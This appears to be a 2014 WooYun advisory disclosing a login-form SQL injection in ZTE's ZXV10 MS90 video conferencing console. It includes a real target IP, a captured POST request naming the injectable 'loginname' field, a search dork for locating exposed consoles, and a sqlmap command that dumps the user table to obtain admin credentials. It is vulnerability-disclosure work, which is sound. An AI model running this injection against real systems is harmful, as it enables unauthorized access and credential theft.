当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-081190

漏洞标题:中兴某产品web控制台存在SQL注入

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2014-10-29 14:34

修复时间:2015-01-27 14:36

公开时间:2015-01-27 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-29: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-03: 细节向第三方安全合作伙伴开放
2014-12-25: 细节向核心白帽子及相关领域专家公开
2015-01-04: 细节向普通白帽子公开
2015-01-14: 细节向实习白帽子公开
2015-01-27: 细节向公众公开

简要描述:

详细说明:

ZXV10 MS90 视频会议管理系统,提供统一的视频会议业务及设备管理解决方案,集用户管理、会议管理、资源管理、终端注册认证、权限管理和MCU 设备管理等功能于一体。
中兴公司的视频会议管理系统,部分控制台部署在互联网,部分控制台虽然部署在互联网但是无法检索到。
百度搜索:ZXV10 MS90 V1.
测试多个版本登录处均存在SQL注入,可以获取数据库内所有信息。

漏洞证明:

演示地址:
http://211.137.33.53 前台

11.PNG


http://211.137.33.53:9000 后台

22.PNG


从前台抓取登录对话数据如下:

POST /loginpost.jsp?Language=CN HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://211.137.33.53/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 68
DNT: 1
Host: 211.137.33.53
Cookie: JSESSIONID=BC5400C33FAB78733C3E2983B154AD3B; http211.137.33.5380=CN; [email protected]
[email protected]&password=test&btnSubmit=%E7%99%BB+%E5%BD%95


其中loginnanme处存在注入
当loginname=XXuser和loginname=XXuser'时返回不同信息

feipie.png


pie.png


利用sqlmap进行注入,参数如下:

sqlmap -r /root/b --level=5 --dbms=mysql -p"loginname" --threads=10 --dump -T"user" -D"m9000_asc_db"


注入结果

sql.png


获取后台账号密码后即可登录后台。

33.PNG

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-10-31 08:43

厂商回复:

感谢~

最新状态:

暂无